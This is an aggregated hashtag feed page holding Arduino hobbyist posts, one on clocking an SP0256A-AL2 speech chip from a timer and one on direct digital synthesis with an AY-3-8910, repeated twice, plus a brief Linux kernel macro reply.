- Part 4 – Using a HC4046 PLL as the clock
- Part 5 – Using an I2C SI5351 programmable clock
- Part 6 – Adding MIDI
https://makertube.net/w/paGX4eiCAHgLU9mK2x3uyq
Warning! I strongly recommend using old or second hand equipment for your experiments. I am not responsible for any damage to expensive instruments!
If you are new to Arduino, see the Getting Started pages.
Parts list
- Arduino Uno
- SP0256A-AL2 speech synthesizer chip
- 2x 1KΩ resistors
- 2x 100nF capacitors
- 1x 1uF capacitor
- 1x 3.5mm jack socket
- Breadboard and jumper wires
The Circuit
This is basically the same setup as the previous post, but instead of the 3.579345 MHz oscillator, the clock input of the SP0256A-AL2 is connected to the Arduino D10 pin.
D10 is internally connected to OC1B, or the “B” compare match output of Timer 1 of the ATMega328P.
The Code
To get a clock signal of any kind on one of the output pins requires use of the ATMega328’s timers – in this case Timer 1. This is a 16-bit timer.
To generate an automatic (i.e. with no code driving it once it is set up) square wave signal on the Arduino’s output pin requires the timer to be connected to an output pin to generate a 50% duty cycle PWM signal.
The PWM peripherals can be configured to toggle an output pin when the timer expires, but that therefore requires the PWM to be running at least twice as fast as the required frequency.
From the SP0256A-AL2 datasheet, it has this to say about clocks.
There isn’t a lot to go on here – basically it assumes a 3.12MHz clock with a 48-52% duty cycle for the square wave.
A typical application circuit would be the following (again from the datasheet):
And the final word on oscillators is in the pin descriptions:
The options for creating a 3.12 MHz clock with an Arduino PWM output are pretty limited, due to the following:
- The faster clock for PWM is related to the system IO clock speed of 16MHz, when running with no “prescalar” to drop it down in frequency.
- When running at 16MHz, lower frequencies are obtained by using the “compare match” approach. The timer will reset and the output pin will toggle when a counter match occurs. The counter will count in integer units of the core 16MHz frequency.
- As the output pin will toggle on compare match, the timer must run at twice the frequency of the required clock signal. This allows one period for a HIGH output and one period for a LOW output to generate the required square wave output.
The PWM square wave frequency is given by the following formula (as per the ATMega328P datasheet for Timer 1,3,4):
- Freq = FreqClk / (2 * prescalar * (OCR1B + 1))
Given the above, with a FreqClk of 16MHz, the following are the only real options for a PWM-driven square wave as a clock for this application:
OCR1B compare valueResulting clock frequency08 MHz14 MHz22.7 MHz32 MHz41.6 MHz51.3 MHzSo there isn’t a lot of choice, and nothing particularly close to the required 3.12 MHz, although 2.7 MHz is the closest and would probably do if required.
To configure the above requires the following code:
#define SP0_CLOCK 10 // D10
void clockSetup () {
pinMode(SP0_CLOCK, OUTPUT);
digitalWrite(SP0_CLOCK, LOW);
TCCR1A = (1 << COM1B0);
TCCR1B = (1 << WGM12) | (1 << CS10);
TCCR1C = 0;
TIMSK1 = 0;
OCR1AH = 0;
OCR1AL = 1;
}This configures Timer 1 in Clear-Timer-on-Compare (CTC) mode with no prescalar, toggling OC1B on compare match with the value in OCR1A.
Note: even though there are two pin outputs – OC1A on D9 and OC1B on D10 – which is used is determined by the COM1A/COM1B settings. Even when using OC1B, as I am here, it is still the match value in OCR1A that determines when the counter has reached its “top” value.
I updated the code to try each of the above values for OCR1A in turn and the result is the video at the start of this post.
void setClock (int clock) {
OCR1AH = 0;
OCR1AL = clock;
}Closing Thoughts
It is interesting to note that the Arduino can in fact provide a clock that allows the SP0256A-AL2 to function, even if it is not particularly true to the original at this point.
But it does mean that there isn’t as much control over the pitch as I’d hoped. If I want to get to more of that granularity between 4 MHz and 2 MHz, I’ll have to find another way.
Kevin
-
@ljs @amonakov @pkhuong @thesamesam OK but let's go back to the more verbose way.
#define __alloc_pages_node(...) alloc_hooks(__alloc_pages_node(__VA_ARGS__))
#define __alloc_pages_node_noprof (__alloc_pages_node)Would that work then? Yes it's more (up to twice) #defines than we have now, but it wouldn't require us to rename the underlying functions to _noprof (and having see those _noprof symbols in perf, backtraces etc.).
-
Arduino and AY-3-8910 – Part 3
I suggested in Part 2 that it might be possible to do some simple modulation of the amplitude of the AY-3-8910 channels rather than drive frequencies directly. This is taking a look at the possibilities of some kind of lo-fi direct digital synthesis using that as a basis.
- Part 1 – Getting started and looking at playing YM files.
- Part 2 – Adding basic MIDI control.
- Part 3 – Basic experiments with direct digital synthesis.
- Part 4 – Using the AY-3-8910 as a 4-bit DAC for Mozzi.
- Part 5 – Driving four AY-3-8910s using my AY-3-8910 Experimenter PCB.
https://makertube.net/w/uCSiBG5RBufGqspoHMYFPt
Warning! I strongly recommend using old or second hand equipment for your experiments. I am not responsible for any damage to expensive instruments!
These are the key tutorials for the main concepts used in this project:
- Arduino AY3891x Library: https://github.com/Andy4495/AY3891x
- Arduino Nano AY-3-8910 PCB: https://github.com/GadgetReboot/AY-3-8910
- AY-3-8910 on synth DIY wiki: https://sdiy.info/wiki/General_Instrument_AY-3-8910
If you are new to Arduino, see the Getting Started pages.
Parts list
- Arduino Uno.
- AY-3-8910 chip.
- Either GadgetReboot’s PCB or patch using solderless breadboard or prototyping boards.
- 5V compatible MIDI interface.
- Jumper wires.
Direct Digital Synthesis on the AY-3-8910
I’ve talked about direct digital synthesis before, so won’t go into full detail again. For more, see Arduino R2R Digital Audio – Part 3 and Arduino PWM Sound Output.
But the top-level idea is to set the level of the signal according to a value in a wavetable. If this value is updated at a useful audio rate then it will be interpreted as sound.
There are some pretty major limitations with attempting to do this on the AY-3-8910 however. The biggest one being that there are only 15 levels for the output on each channel.
So I’ll be working to the following properties:
- 4-bit resolution for the output.
- 8-bit wavetable.
- 8.8 fixed point accumulator to index into the wavetable.
- 8096 Hz sample rate.
YouTuber https://www.youtube.com/@inazumadenki5588 had a look at this and showed that the AY-3-8910 needs to be set up as follows:
- Frequency value for the channel should be set to the highest frequency possible.
- All channels should be disabled.
This is due to comments in the datasheet stating that the only way to fully disable a channel is to have 0 in the amplitude field.
Note: for a 8192 sample rate, that means writing out a sample to the AY-3-8910 registers approximately once every 124uS. With a 256 value wavetable, it takes almost 32 mS to write a complete cycle at the native sample rate, which would be around a 30 Hz output.
I’m not sure what the largest increment that would still give a useful signal might be, but say it was 8 values from the wavetable, then that would make the highest frequency supported around 1kHz. Not great, but certainly audible, so worth a try.
Setting up for DDS
I want a regular, reliable, periodic routine to output the levels from the wavetable, and the usual way to achieve this is using a timer and interrupt. As Timer 1 is already in use to generate the 1MHz clock for the AY-3-8910, I’m going to be configuring Timer 2 as follows:
- Timer 2 is an 8-bit timer.
- Use prescalar of 32 which gives a 500kHz clock source (16MHz/32).
- Use CTC (clear timer on compare) mode.
- Generate a compare match interrupt.
- Do not enable any output pins.
The appropriate ATMega328 registers to enable this are:
// COM2A[1:0] = 00 No output
// WGM2[2:0] = 010 CTC mode
// CS2[2:0] = 011 Prescalar=32
ASSR = 0;
TCCR2A = _BV(WGM21);
TCCR2B = _BV(CS21) | _BV(CS20);
TCNT2 = 0;
OCR2A = 60;
TIMSK2 = _BV(OCIE2A);Although it is worth noting that enabling OC1A can be quite useful for debugging. The following toggles the OC2A output (on D11) every time there is a compare match. The frequency seen on D11 will thus be half the anticipated sample frequency.
pinMode(11, OUTPUT);
TCCR2A |= _BV(COM2A0); // COM2A[1:0] = 01 for OC2A toggleAnd this does indeed generate a signal. Here is a trace showing a timing GPIO pin and the AY-3-8910 output.
The problem is that this is meant to be a 440Hz sine wave, and whilst the shape isn’t too bad (it is a little distorted as the amplitude isn’t a true linear shape), the frequency is much nearer 100Hz than 440.
Analysis of Performance
The clue is the other trace, which is a timing pin being toggled every time the Interrupt routine is called. This is showing a 1kHz frequency, which means the IRS is being called with a 2kHz frequency rather than the anticipated 8192Hz. Curiously though I am getting an accurate 4kHz toggle on the timer output pin OC1A indicating the timer is correctly counting with a 8kHz frequency.
No matter how I configured things, the interrupt routine just would not do anything at a faster rate. I had to drop the frequency right down to 2kHz to get the output pin and interrupt routing running together. This means that something in the interrupt routine seems to be taking ~ 450uS to run.
After a fair bit of prodding and probing and checking the ATMega328 datasheet and double checking the register values, I have to conclude that the AY3891x library is just too slow at updating the registers for it to be able to run from the interrupt routine at this speed.
Taking a look at the register write() function in the library, which I need to use to update the channel level, I can see the following is happening:
void AY3891x::write(byte regAddr, byte data) {
latchAddressMode(regAddr);
daPinsOutput(data);
noInterrupts();
mode010to110();
mode110to010();
interrupts();
daPinsInput();
}
void AY3891x::latchAddressMode(byte regAddr) {
mode010to000();
daPinsOutput(_chipAddress | regAddr); // Register address is 4 lsb
mode000to001();
mode001to000();
mode000to010();
}
void AY3891x::daPinsOutput(byte data) {
byte i;
for (i = 0; i < NUM_DA_LINES; i++) {
if (_DA_pin[i] != NO_PIN) pinMode(_DA_pin[i], OUTPUT);
}
for (i = 0; i < NUM_DA_LINES; i++) {
if (_DA_pin[i] != NO_PIN) {
digitalWrite(_DA_pin[i], data & 0x01);
data = data >> 1;
}
}
}
void AY3891x::daPinsInput() {
byte i;
for (i = 0; i < NUM_DA_LINES; i++) {
if (_DA_pin[i] != NO_PIN) pinMode(_DA_pin[i], INPUT);
}
}And every one of those modeXXXtoYYY() functions is a call to digitalWrite(), so I make that 22 calls to ditigalWrite() in order to write a single register value, plus around 16 calls to pinMode(). There are also 5 loops each looping over 8 values.
One person measured the Arduino Uno digitalWrite() function and concluded that it takes 3.4uS to run, so that is a minimum of 75uS of processing in every run through the interrupt routine just for those calls alone. That doesn’t include the calls and other logic going on. It could easily be more than twice that when everything is taken into account.
Dropping in some temporary pin IO either side of the call to the AY write function itself, and I’m measuring just over 250uS for the register update to happen, and that is just for one channel. This means that anything with a period of that or faster is starving the processor from running at all.
Measuring the Basic Performance
At this point I took a step back and created a free-running test sketch to really see what is going on.
#include "AY3891x.h"
AY3891x psg( 17, 8, 7, 6, 5, 4, 3, 2, 16, 15, 14);
#define AY_CLOCK 9 // D9
void aySetup () {
pinMode(AY_CLOCK, OUTPUT);
digitalWrite(AY_CLOCK, LOW);
TCCR1A = (1 << COM1A0);
TCCR1B = (1 << WGM12) | (1 << CS10);
TCCR1C = 0;
TIMSK1 = 0;
OCR1AH = 0;
OCR1AL = 7; // 16MHz / 8 = 2MHz Counter
psg.begin();
// Output highest frequency on each channel, but set level to 0
// Highest freq = 1000000 / (16 * 1) = 62500
psg.write(AY3891x::ChA_Amplitude, 0);
psg.write(AY3891x::ChA_Tone_Period_Coarse_Reg, 0);
psg.write(AY3891x::ChA_Tone_Period_Fine_Reg, 0);
psg.write(AY3891x::ChB_Amplitude, 0);
psg.write(AY3891x::ChB_Tone_Period_Coarse_Reg, 0);
psg.write(AY3891x::ChB_Tone_Period_Fine_Reg, 0);
psg.write(AY3891x::ChC_Amplitude, 0);
psg.write(AY3891x::ChC_Tone_Period_Coarse_Reg, 0);
psg.write(AY3891x::ChC_Tone_Period_Fine_Reg, 0);
// LOW = channel is in the mix.
// Turn everything off..
psg.write(AY3891x::Enable_Reg, 0xFF);
}
int toggle;
void setup() {
pinMode(11, OUTPUT);
toggle = LOW;
digitalWrite(11, toggle);
aySetup();
}
void loop() {
toggle = !toggle;
digitalWrite(11, toggle);
for (int i=0; i<16; i++) {
psg.write(AY3891x::ChA_Amplitude, i);
}
}All this is doing is continually writing 0 to 15 to the channel A level register whilst toggling a GPIO pin. Putting an oscilloscope trace on the IO pin and the AY-3-8910 channel A output gives me the following:
This is running with a period of 6.96mS, meaning each cycle of 16 writes takes 3.5mS, giving me almost 220uS per call to the AY write function which seems to align pretty well with what I was seeing before.
And this is generating an audible tone at around 280Hz, so regardless of any timer settings or waveform processing, this is going to be the baseline frequency on which everything else would have to rest, which isn’t great.
Optimising Register Writes
So at this point I have the choice of attempting to write to the AY-3-8910 myself using PORT IO to eliminate the time it takes for all those loops and digitalWrite() calls. Or I could try some alternative libraries.
The library I’m using aims for the most portable compatibility: “This library uses the generic
digitalWrite()function instead of direct port manipulation, and should therefore work across most, if not all, processors supported by Arduino, so long as enough I/O pins are available for the interface to the PSG.”It is a deliberate design choice, but does require all three bus control signals to be used: BDIR, BC1, BC2.
Alternatives are possible with less pin state changes, but much stricter timing requirements. Some options include:
- https://github.com/53175ddd/AY-3-8910_Arduino – uses a mixture of PORT IO and digitalWrite(). Assumes use of D0-D7 for data channel.
The following are projects that have not used a library, but just done their own thing:
- https://github.com/internalregister/AY-3-8910 – uses a mixture of digitalWrite and PORT IO. Assumes use of D0-D7 for the data channel.
- https://github.com/GaryA/TB-AY-3_MIDI – uses direct PORT IO for D2-D9
Unfortunately none of these really solves the problem as the PCB I’m using does not neatly map onto IO ports to allow the use of direct PORT IO for the data.
So to improve things whilst using this same PCB will require me to re-write the library myself.
As a test however, it is possible to take the IO pin definitions used with the PCB and write a bespoke, optimised register write routine as follows:
void ayFastWrite (byte reg, byte val) {
// Mode=Addr Latch
digitalWrite(BC1, HIGH);
digitalWrite(BDIR, HIGH);
// Latch address
// NB: Addresses are all in range 0..15 so don't need to
// worry about writing out bits 6,7 - just ensure set to zero
PORTD = (PORTD & 0x03) | ((reg & 0xCF)<<2);
PORTB = (PORTB & 0xFE);
PORTC = (PORTC & 0xF7);
// Mode = Inactive
digitalWrite(BC1, LOW);
digitalWrite(BDIR, LOW);
delayMicroseconds(10);
// Mode = Write
digitalWrite(BC1, LOW);
digitalWrite(BDIR, HIGH);
// Write data
PORTD = (PORTD & 0x03) | ((val & 0xCF)<<2); // Shift bits 0:5 to 2:7
PORTB = (PORTB & 0xFE) | ((val & 0x40)>>6); // Shift bit 6 to 0
PORTC = (PORTC & 0xF7) | ((val & 0x80)>>4); // Shift bit 7 to 3
// Mode = Inactive
digitalWrite(BC1, LOW);
digitalWrite(BDIR, LOW);
}I’m using the following mapping of data pins to Arduino digital IO pins to PORTS:
DA0-DA5D2-D7PORTD Bits 0-5DA6D8PORT B Bit 0DA7A3/D17PORT C Bit 3To make this happen I have to ensure that the right bits are set to OUTPUTs and that BC2 is held HIGH prior to using the fastWrite function.
digitalWrite(BC2, HIGH);
DDRD |= 0xFC;
DDRC |= 0x04;
DDRB |= 0x01;This now improves on that previous 280Hz and gives me 1600Hz performance.
So can I do any better? Well there are still between 6 and 8 calls to digitalWrite going on to handle the control signals…
#define BC1LOW {PORTC &= 0xFE;} // A0 LOW
#define BC1HIGH {PORTC |= 0x01;} // A0 HIGH
#define BC2LOW {PORTC &= 0xFD;} // A1 LOW
#define BC2HIGH {PORTC |= 0x02;} // A1 HIGH
#define BDIRLOW {PORTC &= 0xF7;} // A2 LOW
#define BDIRHIGH {PORTC |= 0x04;} // A2 HIGH
void ayFastWrite (byte reg, byte val) {
// Mode=Addr Latch
BC1HIGH;
BDIRHIGH;
// Latch address
PORTD = (PORTD & 0x03) | ((reg & 0xCF)<<2);
PORTB = (PORTB & 0xFE);
PORTC = (PORTC & 0xF7);
// Need 400nS Min
delayMicroseconds(1);
// Mode = Inactive
BC1LOW;
BDIRLOW;
// Need 100nS settle then 50nS preamble
delayMicroseconds(1);
// Mode = Write
BC1LOW;
BDIRHIGH;
// Write data
PORTD = (PORTD & 0x03) | ((val & 0xCF)<<2); // Shift bits 0:5 to 2:7
PORTB = (PORTB & 0xFE) | ((val & 0x40)>>6); // Shift bit 6 to 0
PORTC = (PORTC & 0xF7) | ((val & 0x80)>>4); // Shift bit 7 to 3
// Need 500nS min
delayMicroseconds(1);
// Mode = Inactive
BC1LOW;
BDIRLOW;
// Need 100nS min
}The timings come from the AY-3-8910 datasheet:
The actual minimum and maximum timings for the various “t” values are given in the preceeding table. Most have a minimum value, but tBD has to be noted: the “associative delay time” is 50nS. This means that any changing of BC1, BC2 and BDIR has to occur within 50nS to be considered part of the same action.
There is no means of having a nano-second delay (well, other than just spinning code), so I’ve just used a delayMicroseconds(1) here and there. This isn’t reliably accurate on an Arduino, but as I’m have delays of around half of that as a maximum it seems to be fine.
This now gives me the following:
This is now supporting a natural “as fast as possible” frequency of around 24kHz, meaning each call to the write function is now around 3uS. That is almost a 100x improvement over using all those pinMode and digitalWrite calls.
The downside of this method:
- It is ATMega328 specific.
- It is specific to the pin mappings and PORT usage of this PCB.
- It does not support reading or other chip operations between the writes.
It is also interesting to see that the traces also show the high frequency oscillation (62.5kHz) that is being modulated regardless of the channel frequency and enable settings.
DDS Part 2
Success! At least with a single channel. This is now playing a pretty well in tune 440Hz A.
Notice how the frequency of the timing pin is now ~4.2kHz meaning that the ISR is now indeed firing at the required 8192 Hz.
Here is a close-up of the output signal. The oscilloscope was struggling to get a clean frequency reading, but this is one time I caught it reading something close! I checked the sound itself with a tuning fork (see video). It is indeed 440Hz.
Closing Thoughts
I wanted to get something put together to allow me to drive a DSS wavetable over MIDI, with different waveforms, and so on, but it turned out to be a little more involved getting this far than I anticipated, so I’ll leave it here for now.
But hopefully filling in the gaps won’t take too long and will be the subject of a further post.
Now that I have something that works, I’m actually quite surprised by how well it is working.
Kevin
#arduinoNano #ay38910 #dds #define #directDigitalSynthesis #include #midi
-
Arduino and AY-3-8910 – Part 3
I suggested in Part 2 that it might be possible to do some simple modulation of the amplitude of the AY-3-8910 channels rather than drive frequencies directly. This is taking a look at the possibilities of some kind of lo-fi direct digital synthesis using that as a basis.
- Part 1 – Getting started and looking at playing YM files.
- Part 2 – Adding basic MIDI control.
- Part 3 – Basic experiments with direct digital synthesis.
- Part 4 – Using the AY-3-8910 as a 4-bit DAC for Mozzi.
- Part 5 – Driving four AY-3-8910s using my AY-3-8910 Experimenter PCB.
https://makertube.net/w/uCSiBG5RBufGqspoHMYFPt
Warning! I strongly recommend using old or second hand equipment for your experiments. I am not responsible for any damage to expensive instruments!
These are the key tutorials for the main concepts used in this project:
- Arduino AY3891x Library: https://github.com/Andy4495/AY3891x
- Arduino Nano AY-3-8910 PCB: https://github.com/GadgetReboot/AY-3-8910
- AY-3-8910 on synth DIY wiki: https://sdiy.info/wiki/General_Instrument_AY-3-8910
If you are new to Arduino, see the Getting Started pages.
Parts list
- Arduino Uno.
- AY-3-8910 chip.
- Either GadgetReboot’s PCB or patch using solderless breadboard or prototyping boards.
- 5V compatible MIDI interface.
- Jumper wires.
Direct Digital Synthesis on the AY-3-8910
I’ve talked about direct digital synthesis before, so won’t go into full detail again. For more, see Arduino R2R Digital Audio – Part 3 and Arduino PWM Sound Output.
But the top-level idea is to set the level of the signal according to a value in a wavetable. If this value is updated at a useful audio rate then it will be interpreted as sound.
There are some pretty major limitations with attempting to do this on the AY-3-8910 however. The biggest one being that there are only 15 levels for the output on each channel.
So I’ll be working to the following properties:
- 4-bit resolution for the output.
- 8-bit wavetable.
- 8.8 fixed point accumulator to index into the wavetable.
- 8096 Hz sample rate.
YouTuber https://www.youtube.com/@inazumadenki5588 had a look at this and showed that the AY-3-8910 needs to be set up as follows:
- Frequency value for the channel should be set to the highest frequency possible.
- All channels should be disabled.
This is due to comments in the datasheet stating that the only way to fully disable a channel is to have 0 in the amplitude field.
Note: for a 8192 sample rate, that means writing out a sample to the AY-3-8910 registers approximately once every 124uS. With a 256 value wavetable, it takes almost 32 mS to write a complete cycle at the native sample rate, which would be around a 30 Hz output.
I’m not sure what the largest increment that would still give a useful signal might be, but say it was 8 values from the wavetable, then that would make the highest frequency supported around 1kHz. Not great, but certainly audible, so worth a try.
Setting up for DDS
I want a regular, reliable, periodic routine to output the levels from the wavetable, and the usual way to achieve this is using a timer and interrupt. As Timer 1 is already in use to generate the 1MHz clock for the AY-3-8910, I’m going to be configuring Timer 2 as follows:
- Timer 2 is an 8-bit timer.
- Use prescalar of 32 which gives a 500kHz clock source (16MHz/32).
- Use CTC (clear timer on compare) mode.
- Generate a compare match interrupt.
- Do not enable any output pins.
The appropriate ATMega328 registers to enable this are:
// COM2A[1:0] = 00 No output
// WGM2[2:0] = 010 CTC mode
// CS2[2:0] = 011 Prescalar=32
ASSR = 0;
TCCR2A = _BV(WGM21);
TCCR2B = _BV(CS21) | _BV(CS20);
TCNT2 = 0;
OCR2A = 60;
TIMSK2 = _BV(OCIE2A);Although it is worth noting that enabling OC1A can be quite useful for debugging. The following toggles the OC2A output (on D11) every time there is a compare match. The frequency seen on D11 will thus be half the anticipated sample frequency.
pinMode(11, OUTPUT);
TCCR2A |= _BV(COM2A0); // COM2A[1:0] = 01 for OC2A toggleAnd this does indeed generate a signal. Here is a trace showing a timing GPIO pin and the AY-3-8910 output.
The problem is that this is meant to be a 440Hz sine wave, and whilst the shape isn’t too bad (it is a little distorted as the amplitude isn’t a true linear shape), the frequency is much nearer 100Hz than 440.
Analysis of Performance
The clue is the other trace, which is a timing pin being toggled every time the Interrupt routine is called. This is showing a 1kHz frequency, which means the IRS is being called with a 2kHz frequency rather than the anticipated 8192Hz. Curiously though I am getting an accurate 4kHz toggle on the timer output pin OC1A indicating the timer is correctly counting with a 8kHz frequency.
No matter how I configured things, the interrupt routine just would not do anything at a faster rate. I had to drop the frequency right down to 2kHz to get the output pin and interrupt routing running together. This means that something in the interrupt routine seems to be taking ~ 450uS to run.
After a fair bit of prodding and probing and checking the ATMega328 datasheet and double checking the register values, I have to conclude that the AY3891x library is just too slow at updating the registers for it to be able to run from the interrupt routine at this speed.
Taking a look at the register write() function in the library, which I need to use to update the channel level, I can see the following is happening:
void AY3891x::write(byte regAddr, byte data) {
latchAddressMode(regAddr);
daPinsOutput(data);
noInterrupts();
mode010to110();
mode110to010();
interrupts();
daPinsInput();
}
void AY3891x::latchAddressMode(byte regAddr) {
mode010to000();
daPinsOutput(_chipAddress | regAddr); // Register address is 4 lsb
mode000to001();
mode001to000();
mode000to010();
}
void AY3891x::daPinsOutput(byte data) {
byte i;
for (i = 0; i < NUM_DA_LINES; i++) {
if (_DA_pin[i] != NO_PIN) pinMode(_DA_pin[i], OUTPUT);
}
for (i = 0; i < NUM_DA_LINES; i++) {
if (_DA_pin[i] != NO_PIN) {
digitalWrite(_DA_pin[i], data & 0x01);
data = data >> 1;
}
}
}
void AY3891x::daPinsInput() {
byte i;
for (i = 0; i < NUM_DA_LINES; i++) {
if (_DA_pin[i] != NO_PIN) pinMode(_DA_pin[i], INPUT);
}
}And every one of those modeXXXtoYYY() functions is a call to digitalWrite(), so I make that 22 calls to ditigalWrite() in order to write a single register value, plus around 16 calls to pinMode(). There are also 5 loops each looping over 8 values.
One person measured the Arduino Uno digitalWrite() function and concluded that it takes 3.4uS to run, so that is a minimum of 75uS of processing in every run through the interrupt routine just for those calls alone. That doesn’t include the calls and other logic going on. It could easily be more than twice that when everything is taken into account.
Dropping in some temporary pin IO either side of the call to the AY write function itself, and I’m measuring just over 250uS for the register update to happen, and that is just for one channel. This means that anything with a period of that or faster is starving the processor from running at all.
Measuring the Basic Performance
At this point I took a step back and created a free-running test sketch to really see what is going on.
#include "AY3891x.h"
AY3891x psg( 17, 8, 7, 6, 5, 4, 3, 2, 16, 15, 14);
#define AY_CLOCK 9 // D9
void aySetup () {
pinMode(AY_CLOCK, OUTPUT);
digitalWrite(AY_CLOCK, LOW);
TCCR1A = (1 << COM1A0);
TCCR1B = (1 << WGM12) | (1 << CS10);
TCCR1C = 0;
TIMSK1 = 0;
OCR1AH = 0;
OCR1AL = 7; // 16MHz / 8 = 2MHz Counter
psg.begin();
// Output highest frequency on each channel, but set level to 0
// Highest freq = 1000000 / (16 * 1) = 62500
psg.write(AY3891x::ChA_Amplitude, 0);
psg.write(AY3891x::ChA_Tone_Period_Coarse_Reg, 0);
psg.write(AY3891x::ChA_Tone_Period_Fine_Reg, 0);
psg.write(AY3891x::ChB_Amplitude, 0);
psg.write(AY3891x::ChB_Tone_Period_Coarse_Reg, 0);
psg.write(AY3891x::ChB_Tone_Period_Fine_Reg, 0);
psg.write(AY3891x::ChC_Amplitude, 0);
psg.write(AY3891x::ChC_Tone_Period_Coarse_Reg, 0);
psg.write(AY3891x::ChC_Tone_Period_Fine_Reg, 0);
// LOW = channel is in the mix.
// Turn everything off..
psg.write(AY3891x::Enable_Reg, 0xFF);
}
int toggle;
void setup() {
pinMode(11, OUTPUT);
toggle = LOW;
digitalWrite(11, toggle);
aySetup();
}
void loop() {
toggle = !toggle;
digitalWrite(11, toggle);
for (int i=0; i<16; i++) {
psg.write(AY3891x::ChA_Amplitude, i);
}
}All this is doing is continually writing 0 to 15 to the channel A level register whilst toggling a GPIO pin. Putting an oscilloscope trace on the IO pin and the AY-3-8910 channel A output gives me the following:
This is running with a period of 6.96mS, meaning each cycle of 16 writes takes 3.5mS, giving me almost 220uS per call to the AY write function which seems to align pretty well with what I was seeing before.
And this is generating an audible tone at around 280Hz, so regardless of any timer settings or waveform processing, this is going to be the baseline frequency on which everything else would have to rest, which isn’t great.
Optimising Register Writes
So at this point I have the choice of attempting to write to the AY-3-8910 myself using PORT IO to eliminate the time it takes for all those loops and digitalWrite() calls. Or I could try some alternative libraries.
The library I’m using aims for the most portable compatibility: “This library uses the generic
digitalWrite()function instead of direct port manipulation, and should therefore work across most, if not all, processors supported by Arduino, so long as enough I/O pins are available for the interface to the PSG.”It is a deliberate design choice, but does require all three bus control signals to be used: BDIR, BC1, BC2.
Alternatives are possible with less pin state changes, but much stricter timing requirements. Some options include:
- https://github.com/53175ddd/AY-3-8910_Arduino – uses a mixture of PORT IO and digitalWrite(). Assumes use of D0-D7 for data channel.
The following are projects that have not used a library, but just done their own thing:
- https://github.com/internalregister/AY-3-8910 – uses a mixture of digitalWrite and PORT IO. Assumes use of D0-D7 for the data channel.
- https://github.com/GaryA/TB-AY-3_MIDI – uses direct PORT IO for D2-D9
Unfortunately none of these really solves the problem as the PCB I’m using does not neatly map onto IO ports to allow the use of direct PORT IO for the data.
So to improve things whilst using this same PCB will require me to re-write the library myself.
As a test however, it is possible to take the IO pin definitions used with the PCB and write a bespoke, optimised register write routine as follows:
void ayFastWrite (byte reg, byte val) {
// Mode=Addr Latch
digitalWrite(BC1, HIGH);
digitalWrite(BDIR, HIGH);
// Latch address
// NB: Addresses are all in range 0..15 so don't need to
// worry about writing out bits 6,7 - just ensure set to zero
PORTD = (PORTD & 0x03) | ((reg & 0xCF)<<2);
PORTB = (PORTB & 0xFE);
PORTC = (PORTC & 0xF7);
// Mode = Inactive
digitalWrite(BC1, LOW);
digitalWrite(BDIR, LOW);
delayMicroseconds(10);
// Mode = Write
digitalWrite(BC1, LOW);
digitalWrite(BDIR, HIGH);
// Write data
PORTD = (PORTD & 0x03) | ((val & 0xCF)<<2); // Shift bits 0:5 to 2:7
PORTB = (PORTB & 0xFE) | ((val & 0x40)>>6); // Shift bit 6 to 0
PORTC = (PORTC & 0xF7) | ((val & 0x80)>>4); // Shift bit 7 to 3
// Mode = Inactive
digitalWrite(BC1, LOW);
digitalWrite(BDIR, LOW);
}I’m using the following mapping of data pins to Arduino digital IO pins to PORTS:
DA0-DA5D2-D7PORTD Bits 0-5DA6D8PORT B Bit 0DA7A3/D17PORT C Bit 3To make this happen I have to ensure that the right bits are set to OUTPUTs and that BC2 is held HIGH prior to using the fastWrite function.
digitalWrite(BC2, HIGH);
DDRD |= 0xFC;
DDRC |= 0x04;
DDRB |= 0x01;This now improves on that previous 280Hz and gives me 1600Hz performance.
So can I do any better? Well there are still between 6 and 8 calls to digitalWrite going on to handle the control signals…
#define BC1LOW {PORTC &= 0xFE;} // A0 LOW
#define BC1HIGH {PORTC |= 0x01;} // A0 HIGH
#define BC2LOW {PORTC &= 0xFD;} // A1 LOW
#define BC2HIGH {PORTC |= 0x02;} // A1 HIGH
#define BDIRLOW {PORTC &= 0xF7;} // A2 LOW
#define BDIRHIGH {PORTC |= 0x04;} // A2 HIGH
void ayFastWrite (byte reg, byte val) {
// Mode=Addr Latch
BC1HIGH;
BDIRHIGH;
// Latch address
PORTD = (PORTD & 0x03) | ((reg & 0xCF)<<2);
PORTB = (PORTB & 0xFE);
PORTC = (PORTC & 0xF7);
// Need 400nS Min
delayMicroseconds(1);
// Mode = Inactive
BC1LOW;
BDIRLOW;
// Need 100nS settle then 50nS preamble
delayMicroseconds(1);
// Mode = Write
BC1LOW;
BDIRHIGH;
// Write data
PORTD = (PORTD & 0x03) | ((val & 0xCF)<<2); // Shift bits 0:5 to 2:7
PORTB = (PORTB & 0xFE) | ((val & 0x40)>>6); // Shift bit 6 to 0
PORTC = (PORTC & 0xF7) | ((val & 0x80)>>4); // Shift bit 7 to 3
// Need 500nS min
delayMicroseconds(1);
// Mode = Inactive
BC1LOW;
BDIRLOW;
// Need 100nS min
}The timings come from the AY-3-8910 datasheet:
The actual minimum and maximum timings for the various “t” values are given in the preceeding table. Most have a minimum value, but tBD has to be noted: the “associative delay time” is 50nS. This means that any changing of BC1, BC2 and BDIR has to occur within 50nS to be considered part of the same action.
There is no means of having a nano-second delay (well, other than just spinning code), so I’ve just used a delayMicroseconds(1) here and there. This isn’t reliably accurate on an Arduino, but as I’m have delays of around half of that as a maximum it seems to be fine.
This now gives me the following:
This is now supporting a natural “as fast as possible” frequency of around 24kHz, meaning each call to the write function is now around 3uS. That is almost a 100x improvement over using all those pinMode and digitalWrite calls.
The downside of this method:
- It is ATMega328 specific.
- It is specific to the pin mappings and PORT usage of this PCB.
- It does not support reading or other chip operations between the writes.
It is also interesting to see that the traces also show the high frequency oscillation (62.5kHz) that is being modulated regardless of the channel frequency and enable settings.
DDS Part 2
Success! At least with a single channel. This is now playing a pretty well in tune 440Hz A.
Notice how the frequency of the timing pin is now ~4.2kHz meaning that the ISR is now indeed firing at the required 8192 Hz.
Here is a close-up of the output signal. The oscilloscope was struggling to get a clean frequency reading, but this is one time I caught it reading something close! I checked the sound itself with a tuning fork (see video). It is indeed 440Hz.
Closing Thoughts
I wanted to get something put together to allow me to drive a DSS wavetable over MIDI, with different waveforms, and so on, but it turned out to be a little more involved getting this far than I anticipated, so I’ll leave it here for now.
But hopefully filling in the gaps won’t take too long and will be the subject of a further post.
Now that I have something that works, I’m actually quite surprised by how well it is working.
Kevin
#arduinoNano #ay38910 #dds #define #directDigitalSynthesis #include #midi
-
Arduino and AY-3-8910 – Part 3
